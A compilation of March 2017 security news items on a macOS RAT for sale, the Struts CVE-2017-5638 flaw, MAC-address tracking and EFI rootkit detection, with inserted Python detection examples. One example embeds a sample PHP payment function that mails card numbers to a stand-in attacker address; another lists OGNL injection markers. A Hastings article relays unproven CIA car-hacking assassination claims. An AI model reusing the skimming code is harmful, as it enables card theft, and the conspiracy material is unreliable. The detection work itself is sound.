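The injected sendCcNumber() described above is the kind of change a file-level check can surface. The following is an added example, not code from Sucuri or from the Realex extension: it scans a constructed stand-in for Remote.php, reports functions that are not in the vendor's manifest (the manifest and the PHP source are both assumptions), and flags any function in which card-data accessors reach a mail or network call.

```python
import re

# Constructed stand-in for an SF9 Remote.php that carries an injected
# sendCcNumber() function; this is not the real extension's source.
SAMPLE_REMOTE_PHP = """<?php
class Realex_Payments_Model_Remote extends Mage_Payment_Model_Method_Cc
{
    public function authorize(Varien_Object $payment, $amount)
    {
        $this->sendCcNumber($payment);
        return $this;
    }

    public function capture(Varien_Object $payment, $amount)
    {
        return $this;
    }

    private function sendCcNumber($payment)
    {
        $data = $payment->getCcNumber() . '|' . $payment->getCcExpYear();
        mail('drop@attacker.invalid', 'cc', $data);   // exfiltration by e-mail
    }
}
"""

# Functions the clean vendor copy of the file declares (constructed manifest;
# in practice derive it from the package as shipped by the vendor).
EXPECTED_FUNCTIONS = {"authorize", "capture"}

FUNC_DECL = re.compile(r"\bfunction\s+(\w+)\s*\(")
# Calls that can move data off the server: mail and common network primitives.
EXFIL_CALL = re.compile(r"\b(mail|curl_exec|file_get_contents|fsockopen)\s*\(")
# Magento payment-object accessors and form fields holding card data.
CARD_FIELD = re.compile(r"getCc(Number|Cid|Exp\w*)|cc_number|cc_cid", re.I)


def function_bodies(php_source):
    """Map each declared function name to its body text.

    A plain brace counter is enough for this demonstration; it does not
    account for braces inside PHP strings or comments."""
    bodies = {}
    for decl in FUNC_DECL.finditer(php_source):
        start = php_source.find("{", decl.end())
        if start == -1:
            continue
        depth, pos = 0, start
        while pos < len(php_source):
            if php_source[pos] == "{":
                depth += 1
            elif php_source[pos] == "}":
                depth -= 1
                if depth == 0:
                    break
            pos += 1
        bodies[decl.group(1)] = php_source[start:pos + 1]
    return bodies


def scan_payment_module(php_source, expected_functions):
    """Return findings for functions that are not in the manifest or that
    route card data into a mail/network call."""
    findings = []
    for name, body in function_bodies(php_source).items():
        reasons = []
        if name not in expected_functions:
            reasons.append("function not declared by the vendor package")
        if CARD_FIELD.search(body) and EXFIL_CALL.search(body):
            reasons.append("card fields reach a mail/network call")
        if reasons:
            findings.append({"function": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_payment_module(SAMPLE_REMOTE_PHP, EXPECTED_FUNCTIONS):
        print(finding["function"], "->", "; ".join(finding["reasons"]))
```

Comparing file hashes against the vendor package is the simpler first step; this scan is for the case where the attacker has edited a file that is expected to differ (a customised module).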


New variant of the macOS Proton RAT advertised on Russian cybercrime underground
14.3.2017 securityaffairs Apple

Experts from security firm Sixgill have discovered a new strain of the macOS Proton RAT that is offered for sale on the Russian cybercrime underground.
The Dark Web is the place to find any kind of illegal product or service; malware such as banking trojans and spyware is very popular in the cybercriminal underground.

A new remote access tool (RAT) specifically designed to infect macOS systems is currently being advertised on the Russian cybercrime underground. The researchers at security firm Sixgill discovered the advertisement on crime forums and on a custom website; the threat is also described in videos published on YouTube.

The Proton homepage went down just after the experts at Sixgill published the report.

“Sixgill researchers have encountered a post in one of the leading, closed Russian cybercrime message boards. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. The author offered this product in one of the leading underground cybercrime markets.” reads a report published by Sixgill.

The Proton RAT first appeared in the threat landscape last year. The variant recently advertised on hacking forums includes many features, such as the ability to execute console commands, access the user’s webcam, log keystrokes, capture screenshots and open SSH/VNC remote connections. The malicious code is also able to inject code into the user’s browser to display popups asking victims for information such as credit card numbers, login credentials, and more.

“The malware includes root-access privileges and features allowing an attacker to obtain full control of the victim’s computer. Its capabilities include: running real-time console commands and file-manager, keylogging, SSH/VNC connectivity, screenshots, webcam operation and the ability to present a custom native window requesting information such as a credit-card, driver’s license and more. The malware also boasts the capability of iCloud access, even when two-factor authentication is enabled.” continues the report.

According to the author, macOS Proton RAT is written in native Objective-C and is not detected by any existing MAC OS antivirus solution.

Below is the list of features described in the ad:

macOS Proton RAT

The Proton RAT has root access and is able to elude standard macOS security features, it is also able to bypass two-factor authentication on iCloud accounts.

Researchers speculate that macOS Proton RAT leverages a zero-day vulnerability in macOS, but the most interesting characteristic of the threat is that the malicious code is signed with genuine Apple code-signing certificates. It is likely the author has managed to falsify registration to the Apple Developer ID Program or has stolen the credentials of an Apple developer.

“The real threat behind the software is this: The malware is shipped with genuine Apple code-signing signatures. This means the author of Proton RAT somehow got through the rigorous filtration process Apple places on MAC OS developers of third-party software, and obtained genuine certifications for his program. Sixgill evaluates that the malware developer has managed to falsify registration to the Apple Developer ID Program or used stolen developer credentials for the purpose.” reads the report.

The price for the macOS Proton RAT ranged from $1,200 to $830,000 for the entire project (an absurd price). Below are the versions advertised on the Proton website:

Standard Edition

I) License to control only ONE remote machine
   1) 1 BTC — unsigned
   2) 2 BTC — signed
II) License to control 20 remote machines
   1) 10 BTC — unsigned
   2) 11 BTC — signed
III) License to control infinite remote machines
   1) 66 BTC — unsigned
   2) 76 BTC — signed

Extended edition

I) License to control infinite remote machines
   1) 166 BTC — unsigned
   2) 200 BTC — signed
II) License to control infinite remote machines on your own server
   1) 366 BTC — without source code
   2) 666 BTC — with full source code

Researchers noticed that the authors of the malware try to disguise their spyware as legitimate surveillance software.


Facebook and Instagram will not allow developers to scan social media profiles for surveillance
14.3.2017 securityaffairs Social

Facebook and Instagram will not allow developers to scan their social media profiles for surveillance activities.
Facebook and its app Instagram have updated their terms and conditions to prevent developers from scanning social media profiles for surveillance activities.

A recently published report revealed that the US Department of Homeland Security used software to scan the social media accounts of people visiting the USA in an attempt to identify terrorists.

The experiment was conducted in December 2015 by the US Citizenship and Immigration Services, but the results obtained were not satisfactory.

The disappointing results pushed the DHS to look for companies that could improve its scanning capabilities.

“DHS has established a task force for using social media to screen applicants for immigration benefits. In connection with that effort, U.S. Citizenship and Immigration Services (USCIS) began pilots to expand social media screening of immigration applicants” reads the report.

“In reviewing the pilot, USCIS concluded that the tool was not a viable option for automated social media screening and that manual review was more effective at identifying accounts.”

“USCIS based its conclusion on the tool’s low ‘match confidence.’ Because the resulting accounts identified by the tool did not always match up with the applicants, officers had to manually check the results. However, USCIS did not establish match benchmarks for the tool, so it does not know what level of match confidence would signify success or failure.”

FB surveillance

Facebook has decided to stop allowing private companies and government agencies to use the data feeds of its social media platform and of Instagram for surveillance activities.

“Developers cannot ‘use data obtained from us to provide tools that are used for surveillance.’ Our goal is to make our policy explicit,” Facebook said.

“Over the past several months we have taken enforcement action against developers who created and marketed tools meant for surveillance, in violation of our existing policies; we want to be sure everyone understands the underlying policy and how to comply.”

Other IT giants adopted a similar policy before Facebook. Last year Twitter blocked US intelligence agencies from accessing a service that analyzes the content posted through the social media platform in real time.

“Twitter Inc. cut off U.S. intelligence agencies from access to a service that sifts through the entire output of its social-media postings, the latest example of tension between Silicon Valley and the federal government over terrorism and privacy.” states The Wall Street Journal.

The social media giant owns about a five percent stake in Dataminr, the only service allowed to access the real-time stream of public tweets.

Twitter banned third-party companies from selling data to intelligence agencies for surveillance. After the end of a pilot programme conducted by In-Q-Tel, the company told Dataminr that it will stop providing the service to the US Government. Dataminr has a $225,000 contract to provide its service to the Department of Homeland Security.

Of course, such measures will not block surveillance programs conducted by US intelligence, which can demand data from Facebook via National Security Letters or collect information through surveillance programs like PRISM.


Vulnerabilities Found in Double Telepresence Robots

13.3.2017 securityweek Vulnerebility

Researchers at Rapid7 discovered several vulnerabilities in Double telepresence robots from Double Robotics. The vendor has addressed the more serious issues with server-side fixes.

Double is a robot that allows people to have a physical presence at their workplace or school without actually being there in person. The product, often described as an iPad on a stick, has been used by many companies and universities.

Rapid7 researchers discovered that the Double telepresence robot had been affected by at least three vulnerabilities, including ones that could have been, or can be, exploited to take control of the machine.

Double robot

One of the flaws found by the experts allowed an unauthenticated attacker to gain access to device information, including GPS coordinates, device serial numbers, current and historical driver and robot session data, and device installation keys. The security hole could have been exploited simply by incrementing the value of a parameter in a specified URL.

The second vulnerability is related to the access token (driver_token) created when an account is assigned to a robot. The problem, according to researchers, was that the token never changed or expired, allowing an attacker who possessed the token to remotely take control of a robot.

The access token could have been obtained via an SSL man-in-the-middle (MitM) attack or from the robot’s iPad.

The third weakness is related to the fact that an attacker does not need to know the challenge PIN when pairing the mobile application (i.e. the iPad) to the drive unit via Bluetooth, enabling them to take control of the drive unit.

However, there are some mitigations against potential attacks. The attacker needs to be in Bluetooth range – the distance can be up to one mile if a high-gain antenna is used – and only one mobile device can be paired with the drive unit at one time.

The vulnerabilities were reported to Double Robotics in December, and the unauthenticated data access and session management flaws were addressed in mid-January on the server side.

The vendor believes the Bluetooth pairing issue is not a serious vulnerability and it does not plan on fixing it. Nevertheless, Rapid7 believes users should be aware of the flaw.

“Rapid7's thorough penetration tests ensure all of our products run as securely as possible, so we can continue delivering the best experience in telepresence,” said Double Robotics co-founder and CEO David Cann. “Before the patches were implemented, no calls were compromised and no sensitive customer data was exposed. In addition, Double uses end-to-end encryption with WebRTC for low latency, secure video calls.”

Rapid7 also reported the vulnerabilities to CERT/CC. The organizations agreed not to assign CVE identifiers considering that only one instance of the software was affected and users were not required to take any action to apply the patches.

Rapid7’s security advisory comes just days after IOActive warned that many robots are affected by serious vulnerabilities.


UK Intelligence Agency Warns of Russian Political Hacking Capabilities

13.3.2017 securityweek BigBrothers

The UK's National Cyber Security Center (NCSC, part of GCHQ) has written to the British political parties to warn about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.

In a similar vein, the British Foreign Secretary Boris Johnson said on national television Sunday, "We have no evidence the Russians are actually involved in trying to undermine our democratic processes at the moment. We don’t actually have that evidence. But what we do have is plenty of evidence that the Russians are capable of doing that."

He added, "There is no doubt that they have been up to all sorts of dirty tricks – bringing down French TV stations; you have seen what happened in the United States where there is no question at all they were involved in the hacking of the Democratic National Convention."

In October 2016, the US government accused Russia of being behind cyberattacks against American political organizations. In December 2016, Germany accused Russia of waging hybrid political warfare. "Such cyber-attacks, or hybrid conflicts as they are known in Russian doctrine, are now part of daily life and we must learn to cope with them," said Chancellor Angela Merkel. Earlier this month the French government abandoned plans for expatriate electronic voting in the April/May presidential election after the National Cybersecurity Agency warned of an "extremely high risk" of cyberattacks.

In his letter to the British political parties, NCSC chief executive Ciaran Martin wrote, "You will be aware of the coverage of events in the United States, Germany and elsewhere reminding us of the potential for hostile action against the UK political system. This is not just about the network security of political parties' own systems. Attacks against our democratic processes go beyond this and can include attacks on parliament, constituency offices, thinktanks and pressure groups and individuals' email accounts."

In a separate statement, he explained, "Protecting the UK’s political system from hostile cyber-activity is one of our operational priorities, so we have signposted parties to existing guidance and will deliver tailored seminars on cyber-security measures. The seminars will build on our existing advice and will provide an overview of threats, case studies on recent cyber-incidents, practical steps to reduce the risk and advice on incident management."


New Malware Variants Near Record-Highs: Symantec

13.3.2017 securityweek Virus
The number of new malware variants that emerged in February 2017 was three times higher compared to January, nearly reaching the record-high levels registered in October 2016, Symantec reports.

Last month the security company registered 94.1 million malware variants, which marks a worrying increase when compared to the 32.9 million seen in January and only 19.5 million in December. Furthermore, Symantec’s Latest Intelligence for February 2017 reveals that the Kovter malware family is the driving force behind this uptick.

The rate of email malware increased as well, reaching one in 635 emails in February, up from one in 722 the previous month. Despite that, the overall email malware rates remain low compared to previous months, most probably as the result of “a lull in activity from the Necurs botnet which has been quiet since late last year,” Symantec says.

The global spam rate registered a very small drop of only 0.1 percentage points in February, reaching 53.7% from the 53.8% registered in January. The Construction sector was hit the most, with a 59.28% spam rate, followed very closely by the Mining sector at 59.27%.

The number of web attacks blocked in February was 394,000 per day, down slightly from 419,000 in January, Symantec says. RIG remains the most active exploit kit, with a 25% share (down from 28.9% in January), followed by SunDown at 14.5% (up from 8.1% in January), Magnitude at 4.6% (down from 6.1%), Angler at 0.6% (down from 0.9%), and Neutrino at 0.5% (down from 0.8%).

One of the most notable threats discussed in February was the destructive disk-wiping malware Shamoon, which is believed to have been used by actors conducting a much wider campaign in the Middle East. According to Symantec, Shamoon was used only against specific targets, although the group has been targeting a wider range of organizations.

The number of Android malware variants per family reached 60 last month, although no new malware family was discovered. New variants of the Android.Lockdroid.E family were found last month, one designed to use speech recognition APIs and to demand that victims speak the provided unlock code instead of typing it.

Phishing attacks decreased last month as well, reaching one in 8,246 emails, down from one in 3,271 in January. The phishing rate declined across all industries, the researchers say.

“While phishing rates declined last month, we also saw a new tactic being used by smartphone thieves who are now attempting to phish their victim's login credentials in order to unlock stolen phones. Stolen high-end smartphones can earn criminals a lot of money, but only if they can gain access to them. This latest trick shows the lengths thieves are willing to go to get into a device,” Symantec reports.


The CVE-2017-5638 Apache Struts 2 command execution flaw affects Cisco products
13.3.2017 securityaffairs Vulnerebility

On Friday, Cisco confirmed that at least some of its products are affected by an Apache Struts 2 command execution vulnerability tracked as CVE-2017-5638.
The CVE-2017-5638 remote code execution zero-day has been exploited by attackers in the wild; it affects Struts 2.3.5 through 2.3.31 and Struts 2.5 through 2.5.10.

According to the experts from Cisco Talos, the flaw affects the Jakarta-based file upload Multipart parser under Apache Struts 2.
Tinfoil Security has published an online tool that allows website owners to check if they are vulnerable to CVE-2017-5638 attacks.

The issue was first spotted by the Chinese developer Nike Zheng. The attack sends an invalid Content-Type value to the uploader, which throws an exception and creates the condition for remote code execution.

The issue is documented at Rapid7’s Metasploit Framework GitHub site, and attackers in the wild are exploiting publicly available PoC code that triggers the vulnerability.

“Talos has observed a new Apache vulnerability that is being actively exploited in the wild. The vulnerability (CVE-2017-5638) is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, referenced in this security advisory.” reads the security advisory published by the Talos group. “Talos began investigating for exploitation attempts and found a high number of exploitation events.”

Now Cisco confirmed that the vulnerability affects the Cisco Identity Services Engine (ISE), the Prime Service Catalog Virtual Appliance, and the Unified SIP Proxy Software.

CVE-2017-5638 CISCO Struts 2 flaw

Cisco published a list of dozens of products that are not affected, but the experts are conducting further analysis to assess all the potentially impacted products.

“Cisco is investigating its product line to determine which products may be affected by this vulnerability and the impact on each affected product. Please refer to the Vulnerable Products and Products Confirmed Not Vulnerable sections of this advisory for information about whether a product is affected.” reads the security advisory published by CISCO.

“The Vulnerable Products section includes Cisco bug IDs for each affected product. The bugs are accessible through the Cisco Bug Search Tool and contain additional platform-specific information, including workarounds (if available) and fixed software releases.”

At the time the advisory was published, Cisco had not found any evidence of attacks targeting its products, but the company warned users that a PoC exploit is publicly available.

The experts also observed malicious attacks which turn off firewall processes on the target servers and then drop malicious payloads such as IRC bouncers and DDoS bots.

According to the security firm Rapid7, the majority of malicious traffic comes from two machines located in Zhengzhou and Shanghai, China.

“Based on the traffic we are seeing at this time it would appear that the bulk of the non-targeted malicious traffic appears to be limited attacks from a couple of sources. This could change significantly tomorrow if attackers determine that there is value in exploiting this vulnerability.” reads the blog post published by Rapid 7.

Security vendors have started releasing firewall rules that could be used by administrators to protect their systems and block the attacks.
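The attack described above rides on a Content-Type value that is not a valid media type at all, which is what those firewall rules key on. The following is an added example, not a vendor rule or Apache code: it validates a Content-Type header against a simplified RFC 7231 media-type grammar, blocks values carrying an OGNL expression marker, and runs the check over a constructed access-log excerpt (the log format and the client addresses are assumptions).

```python
import re

# Simplified RFC 7231 media-type grammar: type "/" subtype *( OWS ";" OWS parameter )
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
QUOTED_STRING = r'"(?:[^"\\]|\\.)*"'
PARAMETER = TOKEN + r"=(?:" + TOKEN + "|" + QUOTED_STRING + ")"
MEDIA_TYPE = re.compile(r"^" + TOKEN + "/" + TOKEN + r"(?:\s*;\s*" + PARAMETER + r")*\s*$")

# Substrings that have no place in a Content-Type value and signal an
# attempt to smuggle an OGNL expression into the header.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "@ognl")


def classify_content_type(value):
    """Return (verdict, reason) for one Content-Type header value.

    "block"  - carries an OGNL expression marker; drop the request
    "review" - not a well-formed media type; the Struts parser will raise on it
    "allow"  - syntactically valid media type"""
    v = value.strip()
    if any(marker in v for marker in OGNL_MARKERS):
        return "block", "OGNL expression marker in Content-Type"
    if not MEDIA_TYPE.match(v):
        return "review", "Content-Type is not a syntactically valid media type"
    return "allow", "well-formed media type"


# Constructed access-log excerpt: client, method, path, quoted Content-Type.
# The third line's header value is a constructed marker, not a working payload.
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "(.*)"$')
SAMPLE_LOG = [
    '203.0.113.10 POST /upload.action "multipart/form-data; boundary=----constructed"',
    '203.0.113.11 GET /index.action "text/html; charset=utf-8"',
    '203.0.113.12 POST /upload.action "%{#constructed_marker_only}"',
    '203.0.113.13 POST /upload.action "multipart form data"',
]


def scan_requests(lines):
    """Classify each logged request; returns (client, verdict, reason) triples."""
    results = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue   # skip lines that do not fit the constructed format
        client, _method, _path, content_type = m.groups()
        verdict, reason = classify_content_type(content_type)
        results.append((client, verdict, reason))
    return results


if __name__ == "__main__":
    for client, verdict, reason in scan_requests(SAMPLE_LOG):
        print(f"{client:15} {verdict:7} {reason}")
```

Malformed-but-harmless values do occur from sloppy clients, which is why the grammar failure is a "review" rather than a hard block; patching Struts remains the actual fix.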


Flaws in MAC address randomization implemented by vendors allow mobile tracking
13.3.2017 securityaffairs Mobil

Researchers devised a new attack method that can be leveraged to track mobile devices that rely on the MAC address randomization mechanism.
The MAC address is a unique, hardcoded identifier assigned to a device’s network interface. This characteristic makes it an excellent tool for tracking devices. A group of researchers from the U.S. Naval Academy has devised a new attack method that can be leveraged to track mobile devices that rely on the Media Access Control (MAC) address randomization mechanism used to protect users’ privacy.

MAC address randomization works by broadcasting a random Wi-Fi MAC address, making it difficult to monitor the device’s real MAC address.

Building on previous research, the researchers have demonstrated that MAC address randomization is not sufficient to protect users.

The MAC address randomization was introduced by Google for Android devices in 2015 with the release of Android 6 Marshmallow.

The experts discovered that many device manufacturers that use Android, including Samsung, have not enabled MAC address randomization.

Apple introduced the feature in mid-2014 with the release of iOS 8, but experts found that iOS 10 makes it easy to identify and track devices regardless of their use of MAC address randomization.

U.S. Naval Academy researchers identified serious flaws in the majority of Android implementations of MAC randomization, allowing them to defeat the protection on roughly 96 percent of the mobile devices they tested.

“First, we show that devices commonly make improper use of randomization by sending wireless frames with the true, global address when they should be using a randomized address.” reads the paper published by the experts.

“We move on to extend the passive identification techniques of Vanhoef et al. to effectively defeat randomization in ∼96% of Android phones. Finally, we show a method that can be used to track 100% of devices using randomization, regardless of manufacturer, by exploiting a previously unknown flaw in the way existing wireless chipsets handle low-level control frames.”

The experts also analyzed so-called Karma attacks, a method that leverages rogue access points (EvilAP attack) posing as known and trusted networks.

The researchers devised a new method that relies on Request-to-Send (RTS) and Clear-to-Send (CTS) control frames to expose the global MAC address of any kind of device.

According to the IEEE 802.11 specification, the RTS and CTS control frames are used to avoid collisions: every time a node wants to use the channel to send data, it first transmits an RTS frame to inform the other nodes that the channel should not be used.

The recipient node responds with a CTS frame when it is ready to receive data.

Attackers can exploit this mechanism by sending an RTS frame to an IEEE 802.11 client device and analyzing the CTS response, from which the global MAC address of the target can be derived. Once the global MAC address is obtained, the attacker can use it to track the target device in the future by sending it RTS frames containing the global MAC.

The group of experts successfully tested the technique on several models from multiple vendors, including iPhone 5s, iPhone 6s, iPad Air, Google Pixel, LG Nexus 5X, LG G4 and G5, Motorola Nexus 6, Moto Z Play and OnePlus 3.

MAC address randomization flaws

Experts speculate that RTS/CTS responses are handled within the 802.11 chipset rather than by the operating system; this means the only way to prevent the attacks is to develop a firmware patch that has to be distributed by the manufacturers.

“There are multiple scenarios in which a motivated attacker could use this method to violate the privacy of an unsuspecting user. If the global MAC address for a user is ever known, it can then be added to a database for future tracking,” added the researchers. “Conceivably, an adversary with a sufficiently large database and advanced transmission capabilities could render randomization protections moot.”

The experts highlighted the importance of adopting a universal randomization policy with clear requirements for the implementation of the protection mechanism.

“We propose the following best practices for MAC address randomization. Firstly, mandate a universal randomization policy to be used across the spectra of 802.11 client devices. We have illustrated that when vendors implement unique MAC address randomization schemes it becomes easier to identify and track those devices.” concluded the experts. “A universal policy must include at minimum, rules for randomized MAC address byte structure, 802.11 IE usage, and sequence number behavior,”
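The paper's first finding, devices sending frames with their true global address when a randomized one is expected, can be audited from a capture without any active probing. The following is an added example, not code from the researchers: it classifies source MAC addresses by the U/L bit that every randomized address must set, and lists probe requests sent from a global address. The capture lines are constructed; 00:00:5e:00:53:xx is the IANA documentation range standing in for a real vendor prefix.

```python
import re

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)


def is_locally_administered(mac):
    """True when the U/L bit (bit 1 of the first octet) is set, i.e. the
    address is locally administered; randomized MACs must set this bit."""
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return bool(int(mac[:2], 16) & 0x02)


def oui(mac):
    """Vendor prefix (first three octets) of a global address."""
    return mac.lower()[:8]


# Constructed capture: time, source MAC, frame type. The 00:00:5e:00:53:xx
# address is the IANA documentation range, not a real device.
SAMPLE_FRAMES = """12:00:01 da:a1:19:3c:7e:01 probe_req
12:00:02 da:a1:19:3c:7e:01 probe_req
12:00:03 00:00:5e:00:53:01 probe_req
12:00:04 02:1a:11:f0:aa:bb probe_req
12:00:05 00:00:5e:00:53:01 data"""


def audit_frames(lines):
    """Split source addresses into randomized and global ones and list the
    probe requests sent from a global address: a device that scans for
    networks with its true MAC defeats its own randomization. Data frames
    from a global address are not flagged, since an associated station
    legitimately uses its real MAC."""
    randomized, global_addrs, leaks = set(), set(), []
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue   # tolerate blank or malformed capture lines
        ts, mac, frame_type = parts
        mac = mac.lower()
        if is_locally_administered(mac):
            randomized.add(mac)
            continue
        global_addrs.add(mac)
        if frame_type == "probe_req":
            leaks.append((ts, mac, frame_type))
    return {"randomized": randomized, "global": global_addrs, "global_leaks": leaks}


if __name__ == "__main__":
    report = audit_frames(SAMPLE_FRAMES.splitlines())
    for ts, mac, ftype in report["global_leaks"]:
        print(f"{ts} {mac} ({oui(mac)}) sent a {ftype} with its global address")
```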


CHIPSEC, Intel Security releases detection tool also for CIA EFI rootkits
13.3.2017 securityaffairs BigBrothers

After the CIA leak, Intel Security has released a detection tool for EFI rootkits, a CHIPSEC module that detects rogue binaries inside the computer firmware.
A few days ago, WikiLeaks announced it is working with software makers to fix the zero-day flaws in the Vault7 dump that impacted their products and services. The organization is sharing information on the hacking tools included in the Vault7 dump with them, and IT vendors are already working to solve the problems.
In response to the CIA data Leak, Intel Security has released a tool that allows users to check if the firmware of their computers has been modified and contains unauthorized code.

Digging into the CIA archive, the experts discovered that the hackers of the Agency have developed EFI (Extensible Firmware Interface) rootkits for Apple’s MacBooks.

Developers at the CIA Embedded Development Branch (EDB) group have designed an OS X “implant” called DerStarke that implements a kernel code injection mechanism in a module dubbed Bokor and uses an EFI persistence module called Dark Matter.

The UEFI (Unified EFI) replaces the BIOS in modern computers, it is the low-level firmware that runs just before the operating system during the bootstrap process to initialize the computer.

CHIPSEC

It is composed of a huge number of “applications” that implement different features of modern computers.

Malware running stealthily in the EFI is able to bypass any security mechanism and inject malicious code into the OS kernel; it also gains persistence on the infected machine, allowing the rootkit to survive reboots, system updates and even re-installations of the OS.

Reading the documents it is possible to discover another project developed by the CIA EDB code-named QuarkMatter that is a “Mac OS X EFI implant, which uses an EFI driver stored on the EFI system partition to provide persistence to an arbitrary kernel implant.”

Now the Advanced Threat Research team at Intel Security has designed a new module for its existing CHIPSEC open-source framework that is able to detect malicious EFI binaries.

“CHIPSEC is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low-level interfaces, and forensic capabilities.” reads the description of the framework. “It can be run on Windows, Linux, Mac OS X and UEFI shell. Instructions for installing and using CHIPSEC can be found in the manual (chipsec-manual.pdf).”

CHIPSEC is a collection of command-line tools that use low-level interfaces to analyze a system’s hardware, firmware, and platform components.

The new CHIPSEC module allows the user to take a clean EFI image from the manufacturer, extract its contents and build a whitelist of the files it contains.
CHIPSEC then allows users to compare that list against the binaries that compose the system’s current EFI, or against an EFI image previously extracted from a system.
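The whitelist-and-compare workflow described above, reduced to its core, as an added example that is not CHIPSEC's own code: a clean image's modules become a name-to-SHA-256 whitelist, and a later dump is diffed against it into added, modified and missing modules. Module names and contents are constructed byte strings standing in for the PE binaries a real firmware extraction yields.

```python
import hashlib

# Constructed EFI module contents; real modules are PE/TE binaries extracted
# from a firmware image, here stand-in byte strings.
CLEAN_IMAGE = [
    ("DxeCore", b"\x4d\x5a-dxe-core-constructed"),
    ("Shell", b"\x4d\x5a-shell-constructed"),
    ("PlatformInit", b"\x4d\x5a-platform-init-constructed"),
]

# The same system after a hypothetical implant: one module altered, one added.
CURRENT_IMAGE = [
    ("DxeCore", b"\x4d\x5a-dxe-core-constructed"),
    ("Shell", b"\x4d\x5a-shell-constructed-with-extra-bytes"),
    ("PlatformInit", b"\x4d\x5a-platform-init-constructed"),
    ("UnknownDriver", b"\x4d\x5a-not-in-vendor-image"),
]


def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()


def build_whitelist(modules):
    """Name -> SHA-256 for every module in the clean vendor image."""
    return {name: sha256_hex(blob) for name, blob in modules}


def compare_efi(whitelist, modules):
    """Diff the modules of a live (or previously dumped) EFI against the whitelist."""
    current = {name: sha256_hex(blob) for name, blob in modules}
    added = sorted(set(current) - set(whitelist))
    missing = sorted(set(whitelist) - set(current))
    modified = sorted(name for name in set(whitelist) & set(current)
                      if whitelist[name] != current[name])
    return {"added": added, "modified": modified, "missing": missing}


def verdict(diff):
    """Anything added or modified relative to the vendor image needs investigation;
    a missing module is worth noting but is not by itself a sign of an implant."""
    return "suspicious" if diff["added"] or diff["modified"] else "clean"


if __name__ == "__main__":
    whitelist = build_whitelist(CLEAN_IMAGE)
    diff = compare_efi(whitelist, CURRENT_IMAGE)
    print(verdict(diff), diff)
```

A legitimate firmware update also changes hashes, so the whitelist must be rebuilt from the vendor's image for the exact firmware version installed.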


Michael Hastings crash, incident or assassination? New doubts after Wikileaks Vault 7 leak
13.3.2017 securityaffairs BigBrothers

Was Michael Hastings a victim of the CIA hacking tools? The Wikileaks Vault 7 data leak reveals the Agency’s car hacking capabilities.
This is the story of the mysterious death of Michael Hastings, an American journalist, who rose to prominence with his coverage of the Iraq War for Newsweek in the 2000s.

To better understand the figure, recall that Hastings was one of the harshest critics of the Obama administration and its interference with US journalism. He referred to the restrictions on the freedom of the press imposed by the Obama administration as a “war” on journalism.

His last work, “Why Democrats Love to Spy On Americans“, was published by BuzzFeed on June 7. Hastings died in a fiery high-speed automobile crash on June 18, 2013, in Los Angeles, California.

Michael Hastings crash

When the popular hackers Charlie Miller and Chris Valasek demonstrated that it is possible to hack a connected car remotely, many experts and journalists started speculating that the Hastings incident was caused by US intelligence using some special tool to remotely control a vehicle. Sci-fi? Yet another conspiracy theory?

Last week Wikileaks released the “Vault 7,” a huge trove of CIA files that provided detailed information on the hacking capabilities of the US Central Intelligence Agency, including the ability to remotely hijack vehicles in order to conduct “undetectable assassinations.”

Curiously, according to San Diego 6 News, Hastings had been investigating CIA Director John Brennan prior to the incident; he had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, confirming that the feds were investigating his work.

Just coincidences, perhaps, but some details of the incident raised suspicion among journalists.

“Several details regarding the crash itself also suggested the possibility that Hastings’ death was the result of foul play, despite official statements to the contrary. For instance, the car caused no damage to the median curb dividing the four-lane road where the crash occurred, nor were there any skid marks present – despite the fact that the car made a sudden 60-degree turn into a palm tree.” reported Mintpressnews.com.

There is another strange detail about the incident: a worker at a business located near the site of the crash who witnessed the incident told San Diego News 6 that the car was traveling too fast and that he heard explosions from within the vehicle shortly before the deadly impact.

The police confirmed that the fire inside the car was too intense for this kind of incident, and the coroner had serious difficulties in analyzing Hastings’ body.

The car was never analyzed by independent experts, despite public rumors of foul play.

The former U.S. National Coordinator for Security, Infrastructure Protection and Counterterrorism Richard A. Clarke, told the Huffington Post that the crash that killed Hastings was “consistent with a car cyber attack.”

“What has been revealed as a result of some research at universities is that it’s relatively easy to hack your way into the control system of a car, and to do such things as cause acceleration when the driver doesn’t want acceleration, to throw on the brakes when the driver doesn’t want the brakes on, to launch an air bag,” Clarke told The Huffington Post. “You can do some really highly destructive things now, through hacking a car, and it’s not that hard.”

“So if there were a cyber attack on the car — and I’m not saying there was,” Clarke added, “I think whoever did it would probably get away with it.”

“I’m not a conspiracy guy. In fact, I’ve spent most of my life knocking down conspiracy theories,” said Clarke, who ran afoul of the second Bush administration when he criticized the decision to invade Iraq after 9/11. “But my rule has always been you don’t knock down a conspiracy theory until you can prove it [wrong]. And in the case of Michael Hastings, what evidence is available publicly is consistent with a car cyber attack. And the problem with that is you can’t prove it.”

Back to the present: the documents shared by WikiLeaks contain details of a CIA study on the possibility of infecting the vehicle control systems used by modern cars and trucks. The malicious code would permit the CIA to engage in nearly undetectable assassinations.

“While the Wikileaks documents confirm that this technology existed in 2014, there is reason to believe that the CIA was capable of hacking vehicles as far back as the late 1990s. Gordon Duff, senior editor of Veterans Today, wrote in 2010 about what he termed the CIA’s “Boston Brakes” assassination technique.” continues Mintpressnews.

“In the article, Duff noted that the deaths of Chilcot Inquiry witness Richard Waddington, anti-Zionist Austrian politicians Jorg Haider and even Princess Diana all involved car crashes where the vehicle crashed into objects like concrete abutments but left no skid marks – not unlike the Hastings crash.”

According to a story published by WhoWhatWhy in 2013, Michael Hastings was investigating the CIA’s use of weaponized malware and surveillance tools.


Schneider Electric Patches Flaws in ClearSCADA, Wonderware Products

13.3.2017 securityweek ICS
